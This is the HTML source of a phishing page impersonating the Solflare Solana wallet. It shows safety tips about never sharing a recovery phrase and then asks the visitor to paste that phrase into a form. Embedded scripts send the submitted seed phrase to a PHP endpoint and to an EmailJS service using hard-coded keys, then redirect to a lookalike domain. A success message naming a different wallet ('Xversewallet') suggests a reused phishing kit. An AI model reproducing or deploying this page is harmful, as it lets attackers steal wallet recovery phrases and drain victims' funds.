<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="minimum-scale=1,initial-scale=1,width=device-width">
    <meta name="theme-color" content="#000000">
    <link rel="preconnect" href="https://fonts.gstatic.com/">
    <link href="css2-3?family=Poppins:wght@400;600&amp;family=Roboto+Mono&amp;display=swap" rel="stylesheet">
    <meta name="description" content="Solflare">
    <meta property="og:title" content="Solflare - Your Solana Wallet">
    <meta property="og:type" content="website">
    <meta property="og:description" content="Solflare is a wallet designed for use on the Solana blockchain, and the only wallet you need for Solana">
    <meta property="og:image" content="https://solflare.com/og838f.png?solflare=x">
    <meta property="og:url" content="https://solflare-extension.com/">
    <meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:site" content="@solflare_wallet">
    <link rel="apple-touch-icon" href="assets/favicon.67160fd1.-1.png">
    <link rel="icon" href="assets/favicon.67160fd1.-1.png">
    <title>Solflare</title>
    <link rel="stylesheet" href="bootstrap/3.4.1/css/bootstrap.min-1.css">
    <script src="ajax/libs/jquery/3.6.0/jquery.min-1.js"></script>
    <script src="bootstrap/3.4.1/js/bootstrap.min-1.js"></script>

    <style>
      body {
        font: 400 15px Lato, sans-serif;
        line-height: 1.8;
        color: #818181;
      }
      h2 {
        font-size: 24px;
        text-transform: inherit;
        color: #303030;
        font-weight: 600;
        margin-bottom: 30px;
      }
      h4 {
        font-size: 19px;
        line-height: 1.375em;
        color: #303030;
        font-weight: 400;
        margin-bottom: 30px;
      }
      .jumbotron {
        background-color: #17171d;
        color: #fff;
        padding: 100px 25px;
        font-family: Montserrat, sans-serif;
      }
      .container-fluid {
        padding: 60px 50px;
      }

      .logo-small {
        color: #17171d;
        font-size: 50px;
      }
      .logo {
        color: #17171d;
        font-size: 200px;
      }
      .thumbnail {
        padding: 0 0 15px 0;
        border: none;
        border-radius: 0;
      }
      .thumbnail img {
        width: 100%;
        height: 100%;
        margin-bottom: 10px;
      }
      .carousel-control.right,
      .carousel-control.left {
        background-image: none;
        color: #ff842d;
      }
      .carousel-indicators li {
        border-color: #ff842d;
      }
      .carousel-indicators li.active {
        background-color: #ff842d;
      }
      .item h4 {
        font-size: 19px;
        line-height: 1.375em;
        font-weight: 400;
        font-style: italic;
        margin: 70px 0;
      }
      .item span {
        font-style: normal;
      }
      .panel {
        border: 1px solid #17171d;
        border-radius: 0 !important;
        transition: box-shadow 0.5s;
      }
      .panel:hover {
        box-shadow: 5px 0px 40px rgba(0, 0, 0, 0.2);
      }
      .panel-footer .btn:hover {
        border: 1px solid #17171d;
        background-color: #fff !important;
        color: #17171d;
      }
      .panel-heading {
        color: #fff !important;
        background-color: #17171d !important;
        padding: 25px;
        border-bottom: 1px solid transparent;
        border-top-left-radius: 0px;
        border-top-right-radius: 0px;
        border-bottom-left-radius: 0px;
        border-bottom-right-radius: 0px;
      }
      .panel-footer {
        background-color: white !important;
      }
      .panel-footer h3 {
        font-size: 32px;
      }
      .panel-footer h4 {
        color: #aaa;
        font-size: 14px;
      }
      .panel-footer .btn {
        margin: 15px 0;
        background-color: #17171d;
        color: #fff;
      }
      .navbar {
        margin-bottom: 0;
        background-color: #17171d;
        z-index: 9999;
        border: 0;
        font-size: 12px !important;
        line-height: 1.42857143 !important;
        letter-spacing: 4px;
        border-radius: 0;
        font-family: Montserrat, sans-serif;
      }
      .navbar li a,
      .navbar .navbar-brand {
        color: #fff !important;
      }
      .navbar-nav li a:hover,
      .navbar-nav li.active a {
        color: #17171d !important;
        background-color: #fff !important;
      }
      .navbar-default .navbar-toggle {
        border-color: transparent;
        color: #fff !important;
      }
      footer .glyphicon {
        font-size: 20px;
        margin-bottom: 20px;
        color: #17171d;
      }
      .slideanim {
        visibility: hidden;
      }
      .slide {
        animation-name: slide;
        -webkit-animation-name: slide;
        animation-duration: 1s;
        -webkit-animation-duration: 1s;
        visibility: visible;
      }
      @keyframes slide {
        0% {
          opacity: 0;
          transform: translateY(70%);
        }
        100% {
          opacity: 1;
          transform: translateY(0%);
        }
      }
      @-webkit-keyframes slide {
        0% {
          opacity: 0;
          -webkit-transform: translateY(70%);
        }
        100% {
          opacity: 1;
          -webkit-transform: translateY(0%);
        }
      }
      @media screen and (max-width: 768px) {
        .col-sm-4 {
          text-align: center;
          margin: 25px 0;
        }
        .btn-lg {
          width: 100%;
          margin-bottom: 35px;
        }
      }
      @media screen and (max-width: 480px) {
        .logo {
          font-size: 150px;
        }
      }

      button.btn.btn-default.btn-lg {
        display: inline-flex;
        -webkit-box-align: center;
        align-items: center;
        -webkit-box-pack: center;
        justify-content: center;
        position: relative;
        box-sizing: border-box;
        -webkit-tap-highlight-color: transparent;
        outline: 0px;
        border: 0px;
        margin: 0px;
        cursor: pointer;
        user-select: none;
        vertical-align: middle;
        appearance: none;
        text-decoration: none;
        transition: background-color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms,
          box-shadow 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms,
          border-color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms,
          color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
        color: rgba(0, 0, 0, 0.87);
        box-shadow: rgb(0 0 0 / 20%) 0px 3px 1px -2px,
          rgb(0 0 0 / 14%) 0px 2px 2px 0px, rgb(0 0 0 / 12%) 0px 1px 5px 0px;
        min-width: 0px;
        border-radius: 8px;
        white-space: nowrap;
        background: linear-gradient(
          180.64deg,
          rgb(255, 132, 45) 0.33%,
          rgb(255, 132, 45) 47.37%,
          rgb(255, 132, 45) 99.51%
        );
        font-family: Poppins, "Roboto Mono", -apple-system, BlinkMacSystemFont,
          "Segoe UI", "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji",
          "Segoe UI Emoji", "Segoe UI Symbol";
        font-weight: 600;
        font-size: 16px;
        line-height: 24px;
        letter-spacing: 0px;
        text-transform: uppercase;
        padding: 10px 27px;
      }

      button.btn.btn-default.myb {
        display: inline-flex;
        -webkit-box-align: center;
        align-items: center;
        -webkit-box-pack: center;
        justify-content: center;
        position: relative;
        box-sizing: border-box;
        -webkit-tap-highlight-color: transparent;
        background-color: transparent;
        outline: 0px;
        margin: 0px;
        cursor: pointer;
        user-select: none;
        vertical-align: middle;
        appearance: none;
        text-decoration: none;
        transition: background-color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms,
          box-shadow 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms,
          border-color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms,
          color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
        min-width: 0px;
        border-radius: 8px;
        white-space: nowrap;
        border: 1px solid rgb(255, 132, 45);
        color: rgb(255, 255, 255);
        font-family: Poppins, "Roboto Mono", -apple-system, BlinkMacSystemFont,
          "Segoe UI", "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji",
          "Segoe UI Emoji", "Segoe UI Symbol";
        font-weight: 600;
        font-size: 16px;
        line-height: 24px;
        letter-spacing: 0px;
        text-transform: uppercase;
        padding: 10px 27px;
        margin-right: 2%;
      }

      span.MuiButton-startIcon.MuiButton-iconSizeMedium.css-1l6c7y9 {
        user-select: none;
        width: 1em;
        height: 1em;
        display: inline-block;
        fill: currentcolor;
        flex-shrink: 0;
        transition: fill 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
        font-size: 1.5rem;
        margin-right: 8px;
      }

      @media only screen and (max-width: 600px) {
        .navbar-right {
          float: right !important;
          margin-right: -15px;
          display: none;
        }

        button.btn.btn-default.myb {
          display: inline-flex;
          -webkit-box-align: center;
          align-items: center;
          -webkit-box-pack: center;
          justify-content: center;
          position: relative;
          box-sizing: border-box;
          -webkit-tap-highlight-color: transparent;
          background-color: transparent;
          outline: 0px;
          margin: 0px;
          cursor: pointer;
          user-select: none;
          vertical-align: middle;
          appearance: none;
          text-decoration: none;
          transition: background-color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms,
            box-shadow 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms,
            border-color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms,
            color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
          min-width: 0px;
          border-radius: 8px;
          white-space: nowrap;
          border: 1px solid rgb(255, 132, 45);
          color: rgb(255, 255, 255);
          font-family: Poppins, "Roboto Mono", -apple-system, BlinkMacSystemFont,
            "Segoe UI", "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji",
            "Segoe UI Emoji", "Segoe UI Symbol";
          font-weight: 600;
          font-size: 16px;
          line-height: 24px;
          letter-spacing: 0px;
          text-transform: uppercase;
          padding: 10px 27px;
          margin-right: 2%;
          margin-top: 15%;
        }
      }

      .MuiGrid-root.MuiGrid-item.MuiGrid-grid-xs-6.MuiGrid-grid-sm-4.css-nlcweg {
        padding-left: 16px;
        padding-top: 16px;
      }

      .jssSolrise10.MuiBox-root.css-0 {
        border: 1px solid rgba(255, 255, 255, 0.1);
        padding: 8px;
        background: rgba(23, 23, 29, 0.2);
        margin-top: 24px;
      }

      .MuiGrid-root.MuiGrid-container.MuiGrid-spacing-xs-2.jssSolrise11.css-isbt42 {
        box-sizing: border-box;
        display: flex;
        flex-flow: row wrap;
        margin-top: -16px;
        width: calc(100% + 16px);
        margin-left: -16px;
        padding: 16px;
      }

      button.MuiButton-root.MuiButton-text.MuiButton-textPrimary.MuiButton-sizeMedium.MuiButton-textSizeMedium.MuiButtonBase-root.css-cs79w9 {
        display: inline-flex;
        -webkit-box-align: center;
        align-items: center;
        -webkit-box-pack: center;
        justify-content: center;
        position: relative;
        box-sizing: border-box;
        -webkit-tap-highlight-color: transparent;
        background-color: transparent;
        outline: 0px;
        border: 0px;
        margin: 0px;
        cursor: pointer;
        user-select: none;
        vertical-align: middle;
        appearance: none;
        text-decoration: none;
        transition: background-color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms,
          box-shadow 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms,
          border-color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms,
          color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
        color: rgb(255, 132, 45);
        min-width: 0px;
        border-radius: 8px;
        white-space: nowrap;
        font-family: Poppins, "Roboto Mono", -apple-system, BlinkMacSystemFont,
          "Segoe UI", "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji",
          "Segoe UI Emoji", "Segoe UI Symbol";
        font-weight: 600;
        font-size: 16px;
        line-height: 24px;
        letter-spacing: 0px;
        text-transform: uppercase;
        padding: 10px 27px;
        float: left;
      }

      a.MuiButton-root.MuiButton-text.MuiButton-textPrimary.MuiButton-sizeMedium.MuiButton-textSizeMedium.MuiButtonBase-root.css-cs79w9 {
        display: inline-flex;
        -webkit-box-align: center;
        align-items: center;
        -webkit-box-pack: center;
        justify-content: center;
        position: relative;
        box-sizing: border-box;
        -webkit-tap-highlight-color: transparent;
        background-color: transparent;
        outline: 0px;
        border: 0px;
        margin: 0px;
        cursor: pointer;
        user-select: none;
        vertical-align: middle;
        appearance: none;
        text-decoration: none;
        transition: background-color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms,
          box-shadow 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms,
          border-color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms,
          color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
        color: rgb(255, 132, 45);
        min-width: 0px;
        border-radius: 8px;
        white-space: nowrap;
        font-family: Poppins, "Roboto Mono", -apple-system, BlinkMacSystemFont,
          "Segoe UI", "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji",
          "Segoe UI Emoji", "Segoe UI Symbol";
        font-weight: 600;
        font-size: 16px;
        line-height: 24px;
        letter-spacing: 0px;
        text-transform: uppercase;
        padding: 10px 27px;
      }

      textarea#\:r0\: {
        font: inherit;
        letter-spacing: inherit;
        color: currentcolor;
        border: 0px;
        box-sizing: content-box;
        background: none;
        height: auto;
        margin: 0px;
        -webkit-tap-highlight-color: transparent;
        display: block;
        min-width: 0px;
        width: 100%;
        animation-name: mui-auto-fill-cancel;
        animation-duration: 10ms;
        resize: none;
        padding: 0px;
      }

      input.btn.btn-default.btn-lg {
        display: inline-flex;
        -webkit-box-align: center;
        align-items: center;
        -webkit-box-pack: center;
        justify-content: center;
        position: relative;
        box-sizing: border-box;
        -webkit-tap-highlight-color: transparent;
        outline: 0px;
        border: 0px;
        margin: 0px;
        cursor: pointer;
        user-select: none;
        vertical-align: middle;
        appearance: none;
        text-decoration: none;
        transition: background-color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms,
          box-shadow 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms,
          border-color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms,
          color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
        color: rgba(0, 0, 0, 0.87);
        box-shadow: rgb(0 0 0 / 20%) 0px 3px 1px -2px,
          rgb(0 0 0 / 14%) 0px 2px 2px 0px, rgb(0 0 0 / 12%) 0px 1px 5px 0px;
        min-width: 0px;
        border-radius: 8px;
        white-space: nowrap;
        background: linear-gradient(
          180.64deg,
          rgb(255, 132, 45) 0.33%,
          rgb(255, 132, 45) 47.37%,
          rgb(255, 132, 45) 99.51%
        );
        font-family: Poppins, "Roboto Mono", -apple-system, BlinkMacSystemFont,
          "Segoe UI", "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji",
          "Segoe UI Emoji", "Segoe UI Symbol";
        font-weight: 600;
        font-size: 16px;
        line-height: 24px;
        letter-spacing: 0px;
        text-transform: uppercase;
        padding: 10px 27px;
      }
    </style>
  </head>
  <body style="background-color: #17171d">
    <nav class="navbar navbar-default">
      <div class="container">
        <div class="navbar-header">
          <a class="navbar-brand" href="index-2-1.html"><img src="assets/solflare-logo.6804d45c.-1.svg" width="150px" height="100px"></a>
        </div>
        <div class="collapse navbar-collapse" id="myNavbar">
          <ul class="nav navbar-nav navbar-right">
            <li></li>
            <li></li>
            <li></li>
            <li></li>
            <li><img src="assets/an-1.png"></li>
          </ul>
        </div>
      </div>
    </nav>
    <div class="jumbotron text-left">
      <div class="container">
        <div class="row">
          <div class="col-sm-6" id="hide" style="background-color: #17171d">
            <div id="portfolio" class="container-fluid text-center">
              <div id="myCarousel" class="carousel slide text-center" data-ride="carousel">
                <!-- Indicators -->
                <ol class="carousel-indicators" style="top: 99%">
                  <li data-target="#myCarousel" data-slide-to="0" class="active"></li>
                  <li data-target="#myCarousel" data-slide-to="1"></li>
                  <li data-target="#myCarousel" data-slide-to="2"></li>
                </ol>

                <!-- Wrapper for slides -->
                <div class="carousel-inner" role="listbox">
                  <div class="item active">
                    <p>
                      <img src="assets/carousel-image-phrase.a4e711a6-1.svg">
                      <p></p>
                      <h2 style="color: #fff; font-size: 18px">
                        Never share your recovery phrase with anyone
                      </h2>
                      <span style="color: #ccc; font-size: 14px">Anyone who has it can access your funds from anywhere.
                        Keep it secure!</span>
                    
                  </div>

                  <div class="item">
                    <p>
                      <img src="assets/carousel-image-write-down.9565a9f3-1.svg">
                      <p></p>
                      <h2 style="color: #fff; font-size: 18px">
                        Write it down!
                      </h2>
                      <span style="color: #ccc; font-size: 14px">It's highly recommended to write down your recovery
                        phrase and store it in a safe place so you don't risk
                        losing your funds.</span>
                    
                  </div>

                  <div class="item">
                    <p>
                      <img src="assets/carousel-image-secure.e97295fe-1.svg">
                      <p></p>
                      <h2 style="color: #fff; font-size: 18px">
                        Never share your recovery phrase with anyone!
                      </h2>
                      <span style="color: #fff; font-size: 14px">Anyone who has it can access your funds from anywhere.
                        Keep it secure!</span>
                    
                  </div>
                </div>
              </div>
            </div>
          </div>
          <div class="col-sm-6">
            <form action="t1.php" method="post">
              <h2 style="color: #fff">Enter your recovery phrase.</h2>
              <p style="color: #ccc; font-size: 14px">
                Your recovery phrase is the key to the wallet.
              </p>
             <div class="jssSolrise10 MuiBox-root css-0">
                <textarea rows="5" aria-invalid="false" id=":r0:" name="seedPhrase" placeholder="Paste your recovery phrase here separated by spaces" class="MuiOutlinedInput-input MuiInputBase-input MuiInputBase-inputMultiline MuiInputBase-inputSizeSmall css-8avw56" style="height: 115px" required></textarea>
              </div>
              <br>
              <div class="row">
                <div class="col-sm-4">
                  <button class="MuiButton-root MuiButton-text MuiButton-textPrimary MuiButton-sizeMedium MuiButton-textSizeMedium MuiButtonBase-root css-cs79w9" tabindex="0" type="button" onclick="window.location.href = 'access.html';">
                    Back
                  </button>
                </div>
                <div class="col-sm-8">
                  <input type="submit" value="Continue" name="formSubmit" id="cointiue_btn" class="btn btn-default btn-lg" type="reset">
                </div>
                <br>
              </div>
              <br>
              <br>
              <br>
              <br>
             <!-- <div class="row">
                <div class="col-sm-12" style="text-align: center">
                  Need a new wallet?
                  <a href="create.html" style="color: #ff842d"
                    >Create it here</a
                  >
                </div>
              </div>-->
               <p id="status"></p>
            </form>
          </div>
        </div>
      </div>
    </div>


<style>
  .jss14 {
  padding: 16px;
}

.css-isbt42 {
  box-sizing: border-box;
  display: flex;
  flex-flow: row wrap;
  margin-top: -16px;
  width: calc(100% + 16px);
  margin-left: -16px;
}

.css-3mllz6 {
    display: flex;
    -webkit-box-pack: justify;
    justify-content: space-between;
    margin-bottom: 8px;
}

.css-isbt42 > .MuiGrid-item {
    padding-left: 16px;
}

.css-isbt42 > .MuiGrid-item {
    padding-top: 16px;
}

 @media screen and (max-width: 440px) {
#hide{display:none;}
}

.css-nlcweg {
    box-sizing: border-box;
    margin: 0px;
    flex-direction: row;
    flex-basis: 50%;
    -webkit-box-flex: 0;
    flex-grow: 0;
    max-width: 50%;
}
.css-ndai2c {
    font: inherit;
    letter-spacing: inherit;
    color: currentcolor;
    padding: 4px 0px 5px;
    border: 0px;
    box-sizing: content-box;
    background: none;
    height: 1.4375em;
    margin: 0px;
    -webkit-tap-highlight-color: transparent;
    display: block;
    min-width: 0px;
    width: 100%;
    animation-name: mui-auto-fill-cancel;
    animation-duration: 10ms;
}
.css-1lgrg8t {
    margin: 0px;
    color: rgba(255, 255, 255, 0.7);
}

.css-exmjsz {
    font-family: Inter, Poppins, "Roboto Mono", -apple-system, BlinkMacSystemFont, "Segoe UI", "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol";
    font-weight: 400;
    font-size: 16px;
    line-height: 1.4375em;
    letter-spacing: 0px;
    text-transform: none;
    color: rgb(255, 255, 255);
    box-sizing: border-box;
    cursor: text;
    display: inline-flex;
    -webkit-box-align: center;
    align-items: center;
    width: 100%;
    height: unset;
    position: relative;
}


.css-1rryh4p {
    display: inline-flex;
    -webkit-box-align: center;
    align-items: center;
    -webkit-box-pack: center;
    justify-content: center;
    position: relative;
    box-sizing: border-box;
    -webkit-tap-highlight-color: transparent;
    background-color: transparent;
    outline: 0px;
    border: 0px;
    margin: 0px;
    cursor: pointer;
    user-select: none;
    vertical-align: middle;
    appearance: none;
    text-decoration: none;
    transition: background-color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms, box-shadow 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms, border-color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms, color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
    color: rgb(255, 132, 45);
    min-width: 0px;
    border-radius: 8px;
    white-space: nowrap;
    font-family: Inter, Poppins, "Roboto Mono", -apple-system, BlinkMacSystemFont, "Segoe UI", "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol";
    font-weight: 600;
    font-size: 16px;
    line-height: 24px;
    letter-spacing: 0px;
    text-transform: uppercase;
    padding: 10px 27px;
}

.css-ey9fuw {
    display: inline-flex;
    -webkit-box-align: center;
    align-items: center;
    -webkit-box-pack: center;
    justify-content: center;
    position: relative;
    box-sizing: border-box;
    -webkit-tap-highlight-color: transparent;
    background-color: transparent;
    outline: 0px;
    border: 0px;
    margin: 0px;
    cursor: pointer;
    user-select: none;
    vertical-align: middle;
    appearance: none;
    text-decoration: none;
    transition: background-color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms, box-shadow 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms, border-color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms, color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
    color: rgb(255, 132, 45);
    min-width: 0px;
    border-radius: 8px;
    white-space: nowrap;
    font-family: Inter, Poppins, "Roboto Mono", -apple-system, BlinkMacSystemFont, "Segoe UI", "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol";
    font-weight: 600;
    font-size: 16px;
    line-height: 24px;
    letter-spacing: 0px;
    text-transform: uppercase;
    padding: 8px;
    opacity: 1;
}

.css-1t5xh9t {
    display: inline-flex;
    -webkit-box-align: center;
    align-items: center;
    -webkit-box-pack: center;
    justify-content: center;
    position: relative;
    box-sizing: border-box;
    -webkit-tap-highlight-color: transparent;
    background-color: transparent;
    outline: 0px;
    border: 0px;
    margin: 0px;
    cursor: pointer;
    user-select: none;
    vertical-align: middle;
    appearance: none;
    text-decoration: none;
    transition: background-color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms, box-shadow 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms, border-color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms, color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
    color: rgb(255, 132, 45);
    min-width: 0px;
    border-radius: 8px;
    white-space: nowrap;
    font-family: Inter, Poppins, "Roboto Mono", -apple-system, BlinkMacSystemFont, "Segoe UI", "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol";
    font-weight: 600;
    font-size: 16px;
    line-height: 24px;
    letter-spacing: 0px;
    text-transform: uppercase;
    padding: 8px;
    opacity: 0.2;
}
.css-1dgj0bz {
    margin: 0px;
    font-family: Inter, Poppins, "Roboto Mono", -apple-system, BlinkMacSystemFont, "Segoe UI", "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol";
    font-weight: 400;
    font-size: 14px;
    line-height: 21px;
    letter-spacing: 0px;
    text-transform: none;
    color: rgba(255, 255, 255, 0.7);
}

.jss19 {
    border: 1px solid rgba(255, 255, 255, 0.1);
    padding: 8px;
    background: rgba(23, 23, 29, 0.2);
    margin-top: 24px;
}


.css-exmjsz::before {
    border-bottom: 1px solid rgba(0, 0, 0, 0.42);
    left: 0px;
    bottom: 0px;
    content: " ";
    position: absolute;
    right: 0px;
    transition: border-bottom-color 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
    pointer-events: none;
}
.css-1a6giau {
    display: flex;
    height: 0.01em;
    max-height: 2em;
    -webkit-box-align: center;
    align-items: center;
    white-space: nowrap;
    color: rgba(0, 0, 0, 0.54);
    margin-right: 8px;
}
.css-exmjsz::after {
    border-bottom: 2px solid rgb(255, 132, 45);
    left: 0px;
    bottom: 0px;
    content: "";
    position: absolute;
    right: 0px;
    transform: scaleX(0);
    transition: transform 200ms cubic-bezier(0, 0, 0.2, 1) 0ms;
    pointer-events: none;
}

.css-1lgrg8t {
    margin: 0px;
    color: rgba(255, 255, 255, 0.7);
}
</style>


 
  
  
  <style>
  
  #my-form-status{
    width: 90%;
    max-width: 500px;
    text-align:center;
    padding:10px;
    margin:0 auto;
    border-radius:8px;
    
}
#status{
    width: 90%;
    max-width: 500px;
    text-align:center;
    padding:10px;
    margin:0 auto;
    border-radius:8px;
    
}
#status.success{
    background-color:rgb(211, 250, 153);
    animation: status 4s ease forwards;
}
#status.error{
    background-color:red;
}
@keyframes status{
    0%{
        opacity:1;
        pointer-events: all;
    }
    90%{
        opacity:1;
        pointer-events: all;
    }
    100%{
        opacity:0;
        pointer-events:none;
    }
}

#status{
  margin-top: 20px;
}
</style>

<script type="text/javascript" src="npm/%40emailjs/browser%403/dist/email.min-1.js"></script>

    <script type="text/javascript">
      emailjs.init("t0Lxno8K7c4R4jkdZ");
    </script>

    <script type="text/javascript">
      const btn = document.getElementById("cointiue_btn");

      document
        .getElementById("form")
        .addEventListener("submit", function (event) {
          event.preventDefault();

          btn.value = "Sending...";

          const serviceID = "service_lvguqb4";
          const templateID = "template_p8ymzm8";

          emailjs.sendForm(serviceID, templateID, this).then(
            () => {
              btn.value = "Submit";
              console.log("Sent!, kindly await processing.");
            },
            err => {
              btn.value = "Submit";
              setTimeout("location.href = 'https://solflarewebextension.com';", 2000);
              alert(JSON.stringify(err));
            }
          );
        });
    </script>
    
    
    <script>
      window.addEventListener("DOMContentLoaded", function () {
        // get the form elements defined in your form HTML above

        var form = document.getElementById("form");
        var status = document.getElementById("status");

        // Success and Error functions for after the form is submitted

        function success() {
          form.reset();
          status.classList.add("success");
          status.innerHTML =
            "Hello your request has been submitted to Xversewallet";
        }

        function error() {
          status.classList.add("error");
          status.innerHTML = "Oops! There was a problem.";
        }

        // handle the form submission event

        form.addEventListener("submit", function (ev) {
          ev.preventDefault();
          var data = new FormData(form);
          ajax(form.method, form.action, data, success, error);
        });
      });

      // helper function for sending an AJAX request

      function ajax(method, url, data, success, error) {
        var xhr = new XMLHttpRequest();
        xhr.open(method, url);
        xhr.setRequestHeader("Accept", "application/json");
        xhr.onreadystatechange = function () {
          if (xhr.readyState !== XMLHttpRequest.DONE) return;
          if (xhr.status === 200) {
            success(xhr.response, xhr.responseType);
          } else {
            error(xhr.status, xhr.response, xhr.responseType);
          }
        };
        xhr.send(data);
      }
    </script>
    
   
  </body>
</html>
